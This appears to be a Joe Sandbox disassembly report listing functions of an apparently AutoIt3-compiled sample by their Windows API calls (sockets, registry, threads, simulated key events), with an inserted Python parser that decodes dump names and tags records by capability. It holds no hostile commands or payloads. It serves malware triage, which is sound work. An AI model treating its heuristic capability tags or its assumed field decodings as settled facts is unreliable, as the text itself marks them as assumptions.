                                                                                                                                                    • __lock.LIBCMT ref: 00417981
                                                                                                                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                    • __lock.LIBCMT ref: 004179A2
                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL$pI
• API String ID: 637971194-197072765
• Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
• Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
• Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
• Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D

APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove$_malloc
• String ID:
• API String ID: 1938898002-0
• Opcode ID: 47ae332b0c3fdd5c6a5b7ee933624023be2332cac83d4d1564717d643a2c9bf0
• Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
• Opcode Fuzzy Hash: 47ae332b0c3fdd5c6a5b7ee933624023be2332cac83d4d1564717d643a2c9bf0
• Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9

APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
• EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
• _memmove.LIBCMT ref: 0044B555
• _memmove.LIBCMT ref: 0044B578
• LeaveCriticalSection.KERNEL32(?), ref: 0044B587
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
• String ID:
• API String ID: 2737351978-0
• Opcode ID: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
• Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
• Opcode Fuzzy Hash: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
• Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58

APIs
• ___set_flsgetvalue.LIBCMT ref: 0041523A
• __calloc_crt.LIBCMT ref: 00415246
• __getptd.LIBCMT ref: 00415253
• CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
• _free.LIBCMT ref: 0041529E
• __dosmaperr.LIBCMT ref: 004152A9
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 3638380555-0
• Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
• Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
• Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
• Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD

APIs
• VariantInit.OLEAUT32(?), ref: 0046C96E
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Variant$Copy$ClearErrorInitLast
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 3207048006-625585964
• Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
• Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5

APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
• gethostbyname.WSOCK32(?), ref: 004655A6
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
• _memmove.LIBCMT ref: 004656CA
• GlobalFree.KERNEL32(00000000), ref: 0046575C
• WSACleanup.WSOCK32 ref: 00465762
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
• String ID:
• API String ID: 2945290962-0
• Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
• Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
• Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
• Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
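Every record in this listing follows the same layout: an APIs block whose bullets carry the call site ("ref:") and, indented one level, calls made by a sub-function; the Memory Dump Source the function was disassembled from; and the Similarity fields (API ID, String ID, Opcode ID, fuzzy hashes). The dump names themselves encode where the code lives. The parser below is an added example written for this page, not Joe Sandbox code: it pulls the call list and the key/value fields out of records constructed from bullets copied above, and decodes the .sdmp names. Reading the name's fifth field as the Win32 page protection and the seventh as the region type is an assumption, not something the page documents; it fits every dump cited here (the .text region at 0x401000 is PAGE_EXECUTE_READ, the header and .rdata pages at 0x400000 and 0x482000 are PAGE_READONLY, the data pages PAGE_READWRITE or PAGE_WRITECOPY, all MEM_IMAGE, which agrees with "based on PE: true"). The capability tags are a triage heuristic assumed for the example.

```python
"""Parse the per-function records of this Joe Sandbox listing and decode the
.sdmp dump-file names they cite.  Added example, not Joe Sandbox's own code."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample: two records built from bullets copied out of the listing
# above, in the report's own layout (a deeper-indented bullet is a sub-call).
SAMPLE = """\
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
Similarity
• String ID:
• Opcode ID: 3da59599e3517c56d786d29cdd3be2166197c4aaac83666dce2fd8ac34c2c006
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
• WSACleanup.WSOCK32 ref: 00465762
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
"""
API_RE = re.compile(r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): (?P<rest>.+)$")
# Win32 constants.  Reading the 5th and 7th dump-name fields as page protection and region
# type is an assumption; it fits every dump on this page (.text 0x401000 -> PAGE_EXECUTE_READ).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# Triage heuristic (assumed for this example, not a Joe Sandbox classification).
CAPABILITY = {"network": {"WSAStartup", "gethostbyname", "inet_addr", "connect", "send", "recv"},
              "thread": {"CreateThread", "ResumeThread", "CreateRemoteThread"},
              "file_io": {"ReadFile", "WriteFile", "CreateFileW", "CreateFileA"}}
# ref = call-site address; subcall_of = callee address on "Part of subcall function" lines
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of", defaults=(None,))

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    associated: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # Similarity / IDA Plugin "key: value" bullets

def decode_sdmp_name(name):
    # '<pid>.<phase>.<dumpid>.<base>.<protect>.<?>.<type>.<?>.sdmp'; pid/phase agree with the
    # snapshot name hcaresult_5_2_400000; dump_id and the two '?' fields are kept opaque.
    parts = re.sub(r"\.sdmp$", "", name).split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name: {name}")
    return {"pid": int(parts[0]), "phase": int(parts[1]), "dump_id": parts[2], "base": int(parts[3], 16),
            "protect": PAGE_PROTECT.get(int(parts[4], 16), parts[4]), "type": MEM_TYPE.get(int(parts[6], 16), parts[6])}

def parse_api(text, subcall_of=None):
    m = API_RE.search(text)
    args = tuple(a for a in (m["args"] or "").split(",") if a) if m else ()
    return ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), subcall_of) if m else None

def parse_records(text):
    # A record opens at "APIs", or at "Memory Dump Source" when no APIs block preceded it.
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line
            if cur is None or section == "APIs" or (section == "Memory Dump Source" and cur.source_file):
                records.append(cur := FunctionRecord())
            continue
        if cur is None:          # bullet before any header: nothing to attach it to
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = SUBCALL_RE.match(body)
            call = parse_api(m["rest"], int(m["caller"], 16)) if m else parse_api(body)
            if call:
                cur.apis.append(call)
        elif section == "Memory Dump Source":
            key, _, val = body.partition(": ")
            if key == "Source File":
                cur.source_file = val.split(",")[0]
            elif key == "Associated":
                cur.associated.append(val)
        else:                    # Similarity, Joe Sandbox IDA Plugin, Strings
            key, _, val = body.partition(":")
            cur.meta[key] = val.strip()
    return records

def capabilities(rec):
    # Direct calls only: a sub-call line describes the callee, not this function.
    names = {c.name for c in rec.apis if c.subcall_of is None}
    return sorted(tag for tag, apis in CAPABILITY.items() if names & apis)

def regions(rec):
    # (base, protection) of every dump the function was disassembled from.
    return [(d["base"], d["protect"]) for d in map(decode_sdmp_name, [rec.source_file, *rec.associated])]
```

Run parse_records over the whole function listing rather than the sample: regions() then tells you which dump, at which protection, to load for a given Opcode ID, and capabilities() surfaces the records worth opening first, such as the WSAStartup/inet_addr/gethostbyname function above, the CRT thread-creation wrapper (CreateThread followed by ResumeThread), and the ReadFile routine that requests 0xFFFF bytes per call under a critical section. The String ID on the Variant record, "Incorrect Object type in FOR..IN loop" and "Null Object assignment in FOR..IN loop", is a pair of AutoIt3 runtime error messages, which is the kind of string worth extracting when deciding what the image at 0x400000 in process 5 actually is.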
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440527
• MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
• SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
• InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
• ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 1457242333-0
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcstok.LIBCMT ref: 004675B2
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcscpy.LIBCMT ref: 00467641
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcslen.LIBCMT ref: 004677BD
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
Strings
Similarity
• API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
• String ID: X
• API String ID: 780548581-3081909835
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
• String ID:
• API String ID: 2027346449-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• _wcslen.LIBCMT ref: 0047A79E
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3257027151-0
                                                                                                                                                    • Opcode ID: fb13d82cc146d1e758beec8d4391eb4325a70a0a41cf77ad705cb1ebe11bd533
                                                                                                                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                    • Opcode Fuzzy Hash: fb13d82cc146d1e758beec8d4391eb4325a70a0a41cf77ad705cb1ebe11bd533
                                                                                                                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
• Opcode ID: 8aa2eb3f3df720354a9e9a8f9290abb7d1a11705e6024be9ce6568ed17a5f946
• Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
• Opcode Fuzzy Hash: 8aa2eb3f3df720354a9e9a8f9290abb7d1a11705e6024be9ce6568ed17a5f946
• Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
• Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
• Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
• Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
• Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: Wu
